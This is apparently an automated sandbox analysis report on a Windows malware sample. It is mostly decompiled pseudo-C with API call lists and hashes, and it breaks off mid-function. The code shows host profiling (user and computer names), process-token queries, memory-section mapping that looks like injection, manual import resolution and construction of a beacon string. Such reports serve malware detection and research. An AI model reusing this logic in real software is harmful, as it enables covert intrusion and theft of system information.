                                                          0x005e91c6
                                                          0x005e9167
                                                          0x005e916c
                                                          0x005e9172
                                                          0x005e9177
                                                          0x005e9185
                                                          0x005e9189
                                                          0x005e9198
                                                          0x005e919f
                                                          0x005e91a6
                                                          0x005e91a6
                                                          0x005e91b1
                                                          0x005e91b1
                                                          0x005e9189
                                                          0x005e9177
                                                          0x005e91c8
                                                          0x005e91ce
                                                          0x005e91d8
                                                          0x005e91da
                                                          0x005e91df
                                                          0x005e91ee
                                                          0x005e91f2
                                                          0x005e91fd
                                                          0x005e9204
                                                          0x005e920b
                                                          0x005e920b
                                                          0x005e9217
                                                          0x005e9217
                                                          0x005e91f2
                                                          0x005e9222
                                                          0x005e9224
                                                          0x005e9227
                                                          0x005e9229
                                                          0x005e922c
                                                          0x005e922f
                                                          0x005e9239
                                                          0x005e923d
                                                          0x005e9241

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 005E916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 005E9183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 005E9190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,005E5D20), ref: 005E91B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 005E91D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 005E91EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 005E91F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,005E5D20), ref: 005E9217
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID: ]^
                                                          • API String ID: 3239747167-1154138136
                                                          • Opcode ID: 5d2cdba24b3f335cd0d909c1ad67e80bcaf62832587f975bc63d70897dc8d602
                                                          • Instruction ID: b58d9a3fa9fa93d567faf78a61c82439650aba7ece0983688ee0a2ba64e61c83
                                                          • Opcode Fuzzy Hash: 5d2cdba24b3f335cd0d909c1ad67e80bcaf62832587f975bc63d70897dc8d602
                                                          • Instruction Fuzzy Hash: 64311C71A00246EFDB18DF65DCC5AAEBBF9FB58300F114465E585DB220D730EE05AB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001456, Relevance: 15.1, APIs: 10, Instructions: 98threadsleepsynchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E10001456(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E10001F0E();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E10001717(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E1000155C(E10001E55,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E10001F87(_t44,  &_a4) != 0) {
					 *0x10004138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x10004138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E10002009(_t48 + _t14);
				 *0x10004138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E1000201E(_t43);
				goto L11;
			}




















                                                          0x1000145d
                                                          0x10001464
                                                          0x10001469
                                                          0x10001559
                                                          0x10001559
                                                          0x10001470
                                                          0x10001474
                                                          0x1000147a
                                                          0x10001488
                                                          0x10001489
                                                          0x1000148c
                                                          0x1000148f
                                                          0x10001498
                                                          0x1000149b
                                                          0x100014a1
                                                          0x100014a4
                                                          0x100014ab
                                                          0x10001556
                                                          0x00000000
                                                          0x10001556
                                                          0x100014b5
                                                          0x10001506
                                                          0x10001506
                                                          0x1000151c
                                                          0x10001521
                                                          0x10001549
                                                          0x10001523
                                                          0x10001526
                                                          0x1000152c
                                                          0x10001531
                                                          0x10001538
                                                          0x10001538
                                                          0x1000153f
                                                          0x1000153f
                                                          0x1000154c
                                                          0x10001552
                                                          0x10001554
                                                          0x10001554
                                                          0x00000000
                                                          0x10001552
                                                          0x100014c2
                                                          0x10001500
                                                          0x00000000
                                                          0x10001500
                                                          0x100014c4
                                                          0x100014c7
                                                          0x100014d0
                                                          0x100014d2
                                                          0x100014d6
                                                          0x100014f8
                                                          0x100014f8
                                                          0x00000000
                                                          0x100014f8
                                                          0x100014d8
                                                          0x100014dd
                                                          0x100014e2
                                                          0x100014e9
                                                          0x00000000
                                                          0x00000000
                                                          0x100014ee
                                                          0x100014f1
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 10001F0E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001462,74B063F0), ref: 10001F1D
                                                            • Part of subcall function 10001F0E: GetVersion.KERNEL32 ref: 10001F2C
                                                            • Part of subcall function 10001F0E: GetCurrentProcessId.KERNEL32 ref: 10001F48
                                                            • Part of subcall function 10001F0E: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F61
                                                          • GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 10001474
                                                          • SwitchToThread.KERNEL32 ref: 1000147A
                                                            • Part of subcall function 10001717: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 1000176D
                                                            • Part of subcall function 10001717: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 10001833
                                                          • Sleep.KERNELBASE(00000000,00000000), ref: 1000149B
                                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100014D0
                                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100014EE
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 10001526
                                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 10001538
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000153F
                                                          • GetLastError.KERNEL32(?,00000000), ref: 10001547
                                                          • GetLastError.KERNEL32 ref: 10001554
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
                                                          • String ID:
                                                          • API String ID: 1962885430-0
                                                          • Opcode ID: 86f2e835d60dbcb1ec91d1cce4192dfe94e3a80051a1e2ef8fba96cdcbc9dbfd
                                                          • Instruction ID: 65dbc16d9a0349db468ca3b41a6515201db422734640c18706fad21f2de96105
                                                          • Opcode Fuzzy Hash: 86f2e835d60dbcb1ec91d1cce4192dfe94e3a80051a1e2ef8fba96cdcbc9dbfd
                                                          • Instruction Fuzzy Hash: 6431C275801A25EBF712EBA48C849DF77FCDF883E2B214122F901D7148EB30DA408BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E5A27, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E005E5A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E005EA71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E005EA734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x005e5a34
                                                          0x005e5a35
                                                          0x005e5a36
                                                          0x005e5a37
                                                          0x005e5a38
                                                          0x005e5a3c
                                                          0x005e5a43
                                                          0x005e5a52
                                                          0x005e5a55
                                                          0x005e5a58
                                                          0x005e5a5f
                                                          0x005e5a62
                                                          0x005e5a65
                                                          0x005e5a68
                                                          0x005e5a6b
                                                          0x005e5a76
                                                          0x005e5a78
                                                          0x005e5a81
                                                          0x005e5a89
                                                          0x005e5a8b
                                                          0x005e5a9d
                                                          0x005e5aa7
                                                          0x005e5aab
                                                          0x005e5aba
                                                          0x005e5abe
                                                          0x005e5ac7
                                                          0x005e5acf
                                                          0x005e5acf
                                                          0x005e5ad1
                                                          0x005e5ad1
                                                          0x005e5ad9
                                                          0x005e5adf
                                                          0x005e5ae3
                                                          0x005e5ae3
                                                          0x005e5aee

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 005E5A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 005E5A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 005E5A9D
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 005E5ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 005E5AC7
                                                          • NtClose.NTDLL(?), ref: 005E5AD9
                                                          • NtClose.NTDLL(00000000), ref: 005E5AE3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 15111794dbe3d385fa9d14a1052943d95f56a4dd089df96244cdc2e6a59dcfab
                                                          • Instruction ID: 3c13d59491bbd3066eeaba9f77086e21bab5d6bcd814e5de72cab6da458a8322
                                                          • Opcode Fuzzy Hash: 15111794dbe3d385fa9d14a1052943d95f56a4dd089df96244cdc2e6a59dcfab
                                                          • Instruction Fuzzy Hash: D82126B1900259EFDB019F95CC89ADEBFBDFB48744F104022F941EA120E7719A459BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001996, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 72%
                                                          			E10001996(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E10001A44(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                          0x1000199f
                                                          0x100019a6
                                                          0x100019a7
                                                          0x100019a8
                                                          0x100019a9
                                                          0x100019aa
                                                          0x100019bb
                                                          0x100019bf
                                                          0x100019d3
                                                          0x100019d6
                                                          0x100019d9
                                                          0x100019e0
                                                          0x100019e3
                                                          0x100019ea
                                                          0x100019ed
                                                          0x100019f0
                                                          0x100019f3
                                                          0x100019f8
                                                          0x10001a33
                                                          0x100019fa
                                                          0x100019fd
                                                          0x10001a03
                                                          0x10001a08
                                                          0x10001a0c
                                                          0x10001a2a
                                                          0x10001a0e
                                                          0x10001a15
                                                          0x10001a23
                                                          0x10001a23
                                                          0x10001a0c
                                                          0x10001a3b

                                                          APIs
                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 100019F3
                                                            • Part of subcall function 10001A44: NtMapViewOfSection.NTDLL(00000000,000000FF,10001A08,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,10001A08,?), ref: 10001A71
                                                          • memset.NTDLL ref: 10001A15
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID: @
                                                          • API String ID: 2533685722-2766056989
                                                          • Opcode ID: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
                                                          • Instruction ID: d3befc9384620d8d128f167a041658b0fdf48f719705d908fc7b69197333c8db
                                                          • Opcode Fuzzy Hash: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
                                                          • Instruction Fuzzy Hash: A921FCB6E00209AFDB11DFA9C8849DEFBF9FF48354F104469E615F7210D731AA448BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001BAC, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E10001BAC(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x10004140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                          0x10001bac
                                                          0x10001bb5
                                                          0x10001bba
                                                          0x10001bc0
                                                          0x10001bc9
                                                          0x10001bcf
                                                          0x10001bd1
                                                          0x10001bd4
                                                          0x10001bd9
                                                          0x10001be0
                                                          0x10001be0
                                                          0x10001be4
                                                          0x10001bea
                                                          0x10001bef
                                                          0x00000000
                                                          0x00000000
                                                          0x10001bf5
                                                          0x10001bff
                                                          0x10001c01
                                                          0x10001c04
                                                          0x10001c07
                                                          0x10001c0b
                                                          0x10001c13
                                                          0x10001c15
                                                          0x10001c18
                                                          0x10001c80
                                                          0x10001c80
                                                          0x10001c84
                                                          0x00000000
                                                          0x00000000
                                                          0x10001c1d
                                                          0x10001c23
                                                          0x10001c25
                                                          0x10001c38
                                                          0x10001c3b
                                                          0x10001c3b
                                                          0x10001c3b
                                                          0x10001c3f
                                                          0x10001c27
                                                          0x10001c27
                                                          0x10001c2f
                                                          0x10001c31
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10001c31
                                                          0x10001c1f
                                                          0x10001c1f
                                                          0x10001c33
                                                          0x10001c33
                                                          0x10001c33
                                                          0x10001c42
                                                          0x10001c45
                                                          0x10001c47
                                                          0x10001c4e
                                                          0x10001c49
                                                          0x10001c49
                                                          0x10001c49
                                                          0x10001c56
                                                          0x10001c5c
                                                          0x10001c5e
                                                          0x10001c8e
                                                          0x10001c60
                                                          0x10001c60
                                                          0x10001c63
                                                          0x10001c65
                                                          0x10001c6d
                                                          0x10001c6d
                                                          0x10001c72
                                                          0x10001c74
                                                          0x10001c7b
                                                          0x10001c7d
                                                          0x10001c7d
                                                          0x10001c7d
                                                          0x00000000
                                                          0x10001c7d
                                                          0x00000000
                                                          0x10001c5e
                                                          0x10001c0d
                                                          0x10001c0d
                                                          0x10001c11
                                                          0x00000000
                                                          0x00000000
                                                          0x10001c11
                                                          0x10001c91
                                                          0x10001c91
                                                          0x10001c98
                                                          0x10001c9d
                                                          0x00000000
                                                          0x00000000
                                                          0x10001ca3
                                                          0x10001cae
                                                          0x00000000
                                                          0x10001cae
                                                          0x10001ca5
                                                          0x10001ca5
                                                          0x10001cab
                                                          0x00000000
                                                          0x10001cab
                                                          0x10001bd9
                                                          0x10001caf
                                                          0x10001cb4

                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 10001BE4
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 10001C56
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID:
                                                          • API String ID: 2574300362-0
                                                          • Opcode ID: 62c796670e4a60b765b11e521790c9b6dde4df6d90a37f565c64d30f3b720e0e
                                                          • Instruction ID: 50b75003dc9d1c4c95d46c285da4c6f2fbc0cd39a6ad98ee869f03b58150b9be
                                                          • Opcode Fuzzy Hash: 62c796670e4a60b765b11e521790c9b6dde4df6d90a37f565c64d30f3b720e0e
                                                          • Instruction Fuzzy Hash: 09313571E4020A9FFB54CF59C890AEEB7F9FF04394B654069E841EB248E770DA41CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001A44, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E10001A44(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                          0x10001a56
                                                          0x10001a5c
                                                          0x10001a6a
                                                          0x10001a71
                                                          0x10001a76
                                                          0x10001a7c
                                                          0x00000000
                                                          0x10001a7d
                                                          0x00000000

                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,10001A08,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,10001A08,?), ref: 10001A71
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction ID: 19d529d38f2a3e11611b8b1d221fd0049a8602d5a3d49d13015f579f0f6b8145
                                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction Fuzzy Hash: A7F012B5A0420CBFEB119FA5CC85C9FBBBDEB44294B104939F552E1094D6309E089A61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E4AB6, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E005E4AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x5ed018; // 0xf1c1aee9
				asm("bswap eax");
				_t61 =  *0x5ed014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x5ed010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E005ED00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x5ed2a8; // 0x107a5a8
				_t3 = _t64 + 0x5ee633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x5ed02c,  *0x5ed004, _t59);
				_t67 = E005E56CD();
				_t68 =  *0x5ed2a8; // 0x107a5a8
				_t4 = _t68 + 0x5ee673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E005E58DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x5ed2a8; // 0x107a5a8
					_t7 = _t126 + 0x5ee8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x5ed238, 0, _v8);
				}
				_t73 = E005EA199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x5ed2a8; // 0x107a5a8
					_t11 = _t121 + 0x5ee8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x5ed238, 0, _v8);
				}
				_t146 =  *0x5ed32c; // 0x16695b0
				_t75 = E005E4622(0x5ed00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x5ed238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x5ed238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x5ed238, _t152, _v20);
						goto L26;
					}
					E005E518F(GetTickCount());
					_t82 =  *0x5ed32c; // 0x16695b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x5ed32c; // 0x16695b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x5ed32c; // 0x16695b0
					_t148 = E005E1BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x5ed238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x5ec28c);
					_push(_t148);
					_t94 = E005E361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x5ed238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E005E9070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E005E6761();
						L22:
						HeapFree( *0x5ed238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E005E69B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_t111 = E005E391F(_t157, _a4, _a8, _a12); // executed
						_v12 = _t111;
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E005EA734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
